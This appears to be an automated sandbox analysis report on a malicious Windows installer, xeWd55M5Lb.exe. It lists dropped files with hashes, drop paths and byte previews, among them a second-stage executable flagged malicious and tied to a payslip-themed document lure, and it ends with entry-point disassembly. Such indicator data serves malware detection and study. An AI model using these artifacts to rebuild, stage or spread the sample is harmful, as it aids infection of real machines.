                                                        Preview:MDMP....... .........b........................................./..........T.......8...........T...........................`...........L....................................................................U...........B..............GenuineIntelW...........T.......(.....b............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8346
                                                        Entropy (8bit):3.6858392865250886
                                                        Encrypted:false
                                                        SSDEEP:192:Rrl7r3GLNiK116XN96YWvSUC4ifgmftOT68SWrSCpDf89byVBlsf7Gm:RrlsNis6X6Y+SUC4Sgmf6S6yyVB+fD
                                                        MD5:095E417556FBE4145584D418DCF6B772
                                                        SHA1:7AF7202D3C0351D630874D100EEDE623D47327BF
                                                        SHA-256:3C92202F1721941A2905E51BAAE3EB4534BF0EBB3A7AB7969A61B67DAAF05222
                                                        SHA-512:3F5A58855CE985EF2A5226794A332F158F71707F299C7B2A9BE61B801AD4FDB903EB43700A468F3FAFF0371F036B1E89036FF7963933ADCFCF7C0BD31870966B
                                                        Malicious:false
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.9.6.<./.P.i.d.>.......
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4650
                                                        Entropy (8bit):4.410251950610384
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwSD8zsBJgtWI9dS5QWgc8sqYjk//8fm8M4J+BObEF++q8vXObhklIhydd:uITfT3HgrsqYocJ+SKEklIhydd
                                                        MD5:4B7DDB96B8B77292E68B177EBDE4FA92
                                                        SHA1:9A19F3FAAAE9BA6B2AFCFFB9055BD98EF3E25896
                                                        SHA-256:D7AB333F19086F597AF1AA41A18DAB47BDDED01D1FBFEF932C1C555093FF0C2B
                                                        SHA-512:BDC9E7B93900ECC95D87D517AAB7425672CCC6B694C34E15A2119BE0AFC65CE19A6CB15D9A7EC730592972892422D3D40FAD9315D4291A5DDA3546E11B418693
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519463" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 14 streams, Tue May 17 19:13:11 2022, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):41278
                                                        Entropy (8bit):1.9415856382736396
                                                        Encrypted:false
                                                        SSDEEP:192:iwZdW3ohUyOIL5oS5Z4Hibq5ArJoxlPvswzz88b:ZWYhaI1oQuCua9oxNgW
                                                        MD5:258AB70E12285B780475C146205FD14F
                                                        SHA1:F5C9B62229C750F054FF7D065C267BCDFEAD8D40
                                                        SHA-256:EFA2A0726FBBBDA1E842F824DD795B00DFFCC0992119C09DDCE9B181A079AF09
                                                        SHA-512:3C43991C0D4DC1D93689C5031A756191BCE771395C1005AB158B65A9B5EFD0EF27AF707CE7E8E43A2AE2118A7D2B5BD1F44443ACC8D72502DA11E73CF999DE78
                                                        Malicious:false
                                                        Preview:MDMP....... .........b........................(...............`/..........T.......8...........T...............n............................................................................................U...........B......x.......GenuineIntelW...........T.......<.....b............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8346
                                                        Entropy (8bit):3.6872385407442496
                                                        Encrypted:false
                                                        SSDEEP:192:Rrl7r3GLNip91x6QX6YWCSU4zBqMWNpgmftOT68SWrSCpDy89bKxsfjOm:RrlsNipB6A6YzSU4zBqhgmf6S6ZKqfz
                                                        MD5:C623C95F321454686EADE50D93287B6C
                                                        SHA1:D167C75E937B33D651E21BFB26DFF7C62FA80A1B
                                                        SHA-256:317D57818CCE1AE7415F4AA39164C546E3E88385E4054053E5559F38B4C10681
                                                        SHA-512:149A92E70D4287CBC3C2B8D8FF82963520DAAB05F178259C7279004AC9AE7AF345296DBD30A00DDCC7F53BA9433EE3D1CE20BD20CF567B3AC781403B5D6362B4
                                                        Malicious:false
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.4.8.<./.P.i.d.>.......
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4650
                                                        Entropy (8bit):4.409978521892262
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwSD8zsBJgtWI9dS5QWgc8sqYjkr/8fm8M4J+BObEFNk+q8vXObLVlIhTd:uITfT3HgrsqYorkJ+uKilIhTd
                                                        MD5:3F5A595F57FA4EC4A6A4016B5C86908B
                                                        SHA1:10A4E08111C046E92EE7B4636DFAA5A2A3E7C252
                                                        SHA-256:82151359BB9059E2032B55D407D5D34C00EB695F54A117C64DF7AC6497639D83
                                                        SHA-512:08F6B1A621D2A876AC6B2537702C557E112AFAE25F9585BB370F623D6F340E66ADDD9D9DD982D9C67363225110EF44F42FFA1D5650A0F14AD574924E1D317370
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519463" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                        Process:C:\Users\user\Desktop\xeWd55M5Lb.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):7218
                                                        Entropy (8bit):6.09068537307505
                                                        Encrypted:false
                                                        SSDEEP:192:NKZQlWjKlEs8sD3PyyS+B7G+H+h+iCykXh5SfHooOFK3/gWW+W2/pNAy/n5S:tLNld4fHo9Q47+W2HBS
                                                        MD5:D4817E78989E590672F8031004C88864
                                                        SHA1:299E84F2A32FA57AD733B4D8B3B680D5D339A623
                                                        SHA-256:DF44088E83EB3E242467C34BC190C25E05F3CF1B9C5B1B7B368F35E7CCFBD4FB
                                                        SHA-512:82463291532613DA4CA62703A68A68C2F402D89872106857B3914A13965E4BE0CAED8C713DDC8B478387661BC5AC5C035232B50CBAEA72403DDBF05951587943
                                                        Malicious:false
                                                        Preview:.y...*D....,7(.Z...(.'.l:..(.'.l:..Z..:.e....Z...J..J.B:......F:.F*..J..J.B:......F:.F*..J..J.B:......F:.F*..J..J.B:......F:.F*..R.yW.#.5$.||:..F:.F*.D:...y..F:.F..D:.D..By...#.6.D:.|*.By.F:.(7FZ...#.......y.z.dZ..J.6.J.3.J..5.J..6.J.0.J.?..I.X.D..X.F..}...J..J..3D:..zF:.|Z.....9.y.....y...DZ.?0D:.0?4....*D....(.'.l:.D:.D.:.L}D:.D.D..Di.D9.yF*.F:.D:.D.D..F.D:.D*.....%w..P.K{..%{..i.%'.P.={..7{....%.1.P..{..9{....*D...e.(.'.l:..:.....B:.F:..R..IwD:....D:.F:.D:.F:...z....I.D:..#.6$..F9.F).B:..#.6...F9.F).#{#.5$..B9z..%'.P..........F:..B:...J.....F:..R..I..Z..x.:.....D:...y.*D.....(.'.l:..:.e...B:.F:..R..IwD:....D:.F:.D:.F:...y......C...D:..#.6$..F9..F).D:..#.6...F9..F).D:..#.6..F9..F).D:i..#.3$.|F9j.F.j.B:..#.6..{F9..F).#z#.5$..B9z..%w..P..........F:..Ru.I.D:.D.uF.h.Ju.Ji.J..J..J.....F:..R..I..Z..x.:.....D:...i.*D...q.:.....B:.F:..R..IwD:....D:.F:.D:.F:...|....I.D:..#.6$..F9..F).D:..#.6...F9..F).#{#.5$..B9z.%.1.P......a...F:...J..J....
                                                        Process:C:\Users\user\Desktop\xeWd55M5Lb.exe
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):75776
                                                        Entropy (8bit):6.193270446965403
                                                        Encrypted:false
                                                        SSDEEP:1536:GkUaNhhJfoI4yRkSzwxUWHQzdYgaeTcczegsWjcdOF:GWhzfOSzAezdnzMOF
                                                        MD5:22A5EC1E72CE0D23B1598C40639BB3B2
                                                        SHA1:44E54FBE0B56A243CFDC3BA01EC0B5D7D0252BAE
                                                        SHA-256:525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
                                                        SHA-512:1530704DBD2CEC6D811253FEF12995AD3BF739F1659F3C7634824EF412FB84592E33D751D1403C712FFB4BF034FFA7EF8C309C988241C92BB5D2445532653443
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 23%
                                                        Joe Sandbox View:
                                                        • Filename: Payslip_APR_2022.doc, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cZ..';..';..';..*ik.?;..*iU.(;..*ij.U;...C..>;..';...;....j.&;....T.&;..Rich';..........................PE..L......b..........................................@..........................p...............................................!..........................................................................@............................................text...F........................... ..`.rdata...L.......N..................@..@.data...,1...0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\xeWd55M5Lb.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):279039
                                                        Entropy (8bit):7.985547118986311
                                                        Encrypted:false
                                                        SSDEEP:6144:mE5rmm6/VUtpaEhhjj8c7pcERJmK7YeyuHa7fCwaE+37TR2+sOrKqy6K4qVJovjN:mEfZ/aEh9jtpNRJmwYJUjwaESA+HrKOn
                                                        MD5:571129812363BF5751369230EDF0A747
                                                        SHA1:D5EEDA388C78A4479453D70F2833969E712E2C5B
                                                        SHA-256:B0ED7C04CF56F147615C69DA29D35A8D7F795F208B7DC15C66063188A26DEEF6
                                                        SHA-512:3717BFD28789A53886141A1B9656F7FBAC25B666CCD3B6356D6A8C84EBF5CCE057C8BF95C664DFDF2F9DB8C3684BF95D6397BB8241A81A1F55A71A001412C1C7
                                                        Malicious:false
                                                        Preview:..?....s....P+.e..QI.b...5....H..._..x.M.#.l.S...t.#..$.!....d\.....[...0...$...YT...E....._I......Aw...#....A.:.....m..0..e*.N=.p....Z.Qx^.\~...%.q.. .<qF3...o...N.`*/.hE1.......?AJ+...SvC)P..$..|.POY..z.....]..`{...c!.T..d..a......8.W.t...G.._J..JC..z+.j..QW...F/...H.*._..xs4.#...S...t.#m.$.!..I.d.xy..6.L.....dt.DC.K.,|.ph....+..$....[....`G.c.^....s...m..0.....).I..:-T..^.G....9\.q..^.$D....%..Y.gw...D.9..g.Wc.d.....=.U_.p..0... .I.~..F.8.4..C.!i.I.|..)..:.P..s........Y.......t.NYG..\........+.j..QI.b...5....N..:....x.{.#.@.S.>.t....$.!..i.d.x..6.P..Udt....K.B..p..L..#..9....[....4G.C.c...s.".m.. .W3p..8^..>.T>.n.G.....\.q..^.$D....%...,g...D.9..g.Wc.d.....=.U_.p.m.... .I.~..F.8.4*.C..i.I.|..)..:.P..s........Y..8.W.t...G.........z+.j..QI.b...5....H..._..x.M.#.l.S...t.#..$.!..i.d.x.6.L..E..dt.D..K..|.ph.L..#..9....[....4G.c.^...s...m..0.W....I..>.T>.n.G....9\.q..^.$D....%...,g...D.9..g.Wc.d.....=.U_.p.m.... .I.~..F.8.4*.C..i.I.|..)..
                                                        Process:C:\Users\user\Desktop\xeWd55M5Lb.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):371399
                                                        Entropy (8bit):7.74164846031575
                                                        Encrypted:false
                                                        SSDEEP:6144:CE5rmm6/VUtpaEhhjj8c7pcERJmK7YeyuHa7fCwaE+37TR2+sOrKqy6K4qVJovjg:CEfZ/aEh9jtpNRJmwYJUjwaESA+HrKOm
                                                        MD5:5A68D6B8A8885F9D66B5FB1AC997AD05
                                                        SHA1:1464557BEE7B00E85E4B0C23E626422FFB5C9677
                                                        SHA-256:024571C42A870740BA742BE308E10C4DA75AEF4E801D77E0792827D423583836
                                                        SHA-512:44A500BB57B03F9231A0DBC9A1B23E76FE9895AF88B19B978C8D571DB684FD9A026070140F032B35D9B3B671E215132B626C540551A4336C691CF29CF44D20C7
                                                        Malicious:false
                                                        Preview:.$......,...................F............#.......$..........................................................................................................................................................................................................................................G...................j...............................................................................................................................m.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):232
                                                        Entropy (8bit):7.024371743172393
                                                        Encrypted:false
                                                        SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                        MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                        SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                        SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                        SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                        Malicious:false
                                                        Preview:Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                        Process:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
                                                        File Type:ISO-8859 text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):8
                                                        Entropy (8bit):3.0
                                                        Encrypted:false
                                                        SSDEEP:3:kpW:kU
                                                        MD5:6AF7523EDC75AEF1076801BAE4594FFB
                                                        SHA1:419A20BB1C3ADD65EEB1C1A1C5EEFD57C5F370E5
                                                        SHA-256:75EDFC9143462BD001AD32C8F8A232A4915CC48D1B5CA347E1C94B69F33B5FF2
                                                        SHA-512:685468DD5BE2E4A96A2E7D2C9751081ACC259CF136218019F60CA152ADD42FA2C7A7E2FE3C4A92F931AA477FB570D09D03F3FE5489FBF27CFE9D16510CBE241F
                                                        Malicious:true
                                                        Preview:O..>98.H
                                                        Process:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):24
                                                        Entropy (8bit):4.584962500721156
                                                        Encrypted:false
                                                        SSDEEP:3:9bzY6oRDJoTBn:RzWDqTB
                                                        MD5:3FCC766D28BFD974C68B38C27D0D7A9A
                                                        SHA1:45ED19A78D9B79E46EDBFC3E3CA58E90423A676B
                                                        SHA-256:39A25F1AB5099005A74CF04F3C61C3253CD9BDA73B85228B58B45AAA4E838641
                                                        SHA-512:C7D47BDAABEEBB8C9D9B31CC4CE968EAF291771762FA022A2F55F9BA4838E71FDBD3F83792709E47509C5D94629D6D274CC933371DC01560D13016D944012DA5
                                                        Malicious:false
                                                        Preview:9iH...}Z.4..f.....l.d
                                                        Process:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):40
                                                        Entropy (8bit):5.221928094887364
                                                        Encrypted:false
                                                        SSDEEP:3:9bzY6oRDMjmPl:RzWDMCd
                                                        MD5:AE0F5E6CE7122AF264EC533C6B15A27B
                                                        SHA1:1265A495C42EED76CC043D50C60C23297E76CCE1
                                                        SHA-256:73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
                                                        SHA-512:DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
                                                        Malicious:false
                                                        Preview:9iH...}Z.4..f..... 8.j....|.&X..e.F.*.
                                                        Process:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):426840
                                                        Entropy (8bit):7.999608491116724
                                                        Encrypted:true
                                                        SSDEEP:12288:zKf137EiDsTjevgA4p0V7njXuWSvdVU7V4OC0Rr:+134i2lp67i5d8+OCg
                                                        MD5:963D5E2C9C0008DFF05518B47C367A7F
                                                        SHA1:C183D601FABBC9AC8FBFA0A0937DECC677535E74
                                                        SHA-256:5EACF2974C9BB2C2E24CDC651C4840DD6F4B76A98F0E85E90279F1DBB2E6F3C0
                                                        SHA-512:0C04E1C1A13070D48728D9F7F300D9B26DEC6EC8875D8D3017EAD52B9EE5BDF9B651A7F0FCC537761212831107646ED72B8ED017E7477E600BC0137EF857AE2C
                                                        Malicious:false
                                                        Preview:..g&jo...IPg...GM....R>i...o...I.>.&.r{....8...}...E....v.!7.u3e.. .....db...}.......".t(.xC9.cp.B....7...'.......%......w.^.._.......B.W%.<..i.0.{9.xS...5...)..w..$..C..?`F..u.5.T.X.w'Si..z.n{...Y!m...RA...xg....[7...z..9@.K.-...T..+.ACe....R....enO.....AoNMT.\^....}H&..4I...B.:..@..J...v..rI5..kP......2j....B..B.~.T..>.c..emW;Rn<9..[.r.o....R[....@=...:...L.g<.....I..%4[.G^.~.l'......v.p&.........+..S...9d/.{..H.`@.1..........f.\s...X.a.].<.h*...J4*...k.x....%3.......3.c..?%....>.!.}..)(.{...H...3..`'].Q.[sN..JX(.%pH....+......(...v.....H...3..8.a_..J..?4...y.N(..D.*h..g.jD..I...44Q?..N......oX.A......l...n?./..........$.!..;.^9"H........*...OkF....v.m_.e.v..f...."..bq{.....O.-....%R+...-..P.i..t5....2Z# ...#...,L..{..j..heT -=Z.P;...g.m)<owJ].J..../.p..8.u8.&..#.m9...j%..g&....g.x.I,....u.[....>./W...........*X...b*Z...ex.0..x.}.....Tb...[..H_M._.^N.d&...g._."@4N.pDs].GbT.......&p........Nw...%$=.....{..J.1....2....<E{..<!G..
                                                        Process:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):75776
                                                        Entropy (8bit):6.193270446965403
                                                        Encrypted:false
                                                        SSDEEP:1536:GkUaNhhJfoI4yRkSzwxUWHQzdYgaeTcczegsWjcdOF:GWhzfOSzAezdnzMOF
                                                        MD5:22A5EC1E72CE0D23B1598C40639BB3B2
                                                        SHA1:44E54FBE0B56A243CFDC3BA01EC0B5D7D0252BAE
                                                        SHA-256:525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
                                                        SHA-512:1530704DBD2CEC6D811253FEF12995AD3BF739F1659F3C7634824EF412FB84592E33D751D1403C712FFB4BF034FFA7EF8C309C988241C92BB5D2445532653443
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 23%
                                                        Joe Sandbox View:
                                                        • Filename: Payslip_APR_2022.doc, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cZ..';..';..';..*ik.?;..*iU.(;..*ij.U;...C..>;..';...;....j.&;....T.&;..Rich';..........................PE..L......b..........................................@..........................p...............................................!..........................................................................@............................................text...F........................... ..`.rdata...L.......N..................@..@.data...,1...0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.939038375304377
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:xeWd55M5Lb.exe
                                                        File size:328454
                                                        MD5:f32d1f6e94da654932e73e42f0f4773a
                                                        SHA1:04e51bb4dedfc85cb6d4dfceb3bf48bf69c2a58a
                                                        SHA256:43f670b439ef8ea9765ef3a61e84f1997e3dfd30067dc11c3203caf258553398
                                                        SHA512:654f6732ab95aad2a8392a4359501d1758023676697c17928a891e1ce02298d93c795be59b683f0961b2b7c15fb4c498747bd03f90fdaefc1ed0caa900ad37ad
                                                        SSDEEP:6144:ZYa6V3+v+HtdlL29jQwnq/c3Ffiy6d2W6zzHIn6pf43lYnkBItVb2slFQ6/gM:ZYD3+v2tP2Vnnq/4iy6wWazHM6FCmbtV
                                                        TLSH:07642309A3E48477C4E391B04E37575EDFF91119AAF82A1B63512B8D7CA3340F26D3A1
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                        Icon Hash:b2a88c96b2ca6a72
                                                        Entrypoint:0x403640
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:61259b55b8912888e90f516ca08dc514
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 000003F4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [ebp-14h], ebx
                                                        mov dword ptr [ebp-04h], 0040A230h
                                                        mov dword ptr [ebp-10h], ebx
                                                        call dword ptr [004080C8h]
                                                        mov esi, dword ptr [004080CCh]
                                                        lea eax, dword ptr [ebp-00000140h]
                                                        push eax
                                                        mov dword ptr [ebp-0000012Ch], ebx
                                                        mov dword ptr [ebp-2Ch], ebx
                                                        mov dword ptr [ebp-28h], ebx
                                                        mov dword ptr [ebp-00000140h], 0000011Ch
                                                        call esi
                                                        test eax, eax
                                                        jne 00007FD154BB642Ah
                                                        lea eax, dword ptr [ebp-00000140h]
                                                        mov dword ptr [ebp-00000140h], 00000114h
                                                        push eax
                                                        call esi
                                                        mov ax, word ptr [ebp-0000012Ch]
                                                        mov ecx, dword ptr [ebp-00000112h]
                                                        sub ax, 00000053h
                                                        add ecx, FFFFFFD0h
                                                        neg ax
                                                        sbb eax, eax
                                                        mov byte ptr [ebp-26h], 00000004h
                                                        not eax
                                                        and eax, ecx
                                                        mov word ptr [ebp-2Ch], ax
                                                        cmp dword ptr [ebp-0000013Ch], 0Ah
                                                        jnc 00007FD154BB63FAh
                                                        and word ptr [ebp-00000132h], 0000h
                                                        mov eax, dword ptr [ebp-00000134h]
                                                        movzx ecx, byte ptr [ebp-00000138h]
                                                        mov dword ptr [0042A318h], eax
                                                        xor eax, eax
                                                        mov ah, byte ptr [ebp-0000013Ch]
                                                        movzx eax, ax
                                                        or eax, ecx
                                                        xor ecx, ecx
                                                        mov ch, byte ptr [ebp-2Ch]
                                                        movzx ecx, cx
                                                        shl eax, 10h
                                                        or eax, ecx
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xa50.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
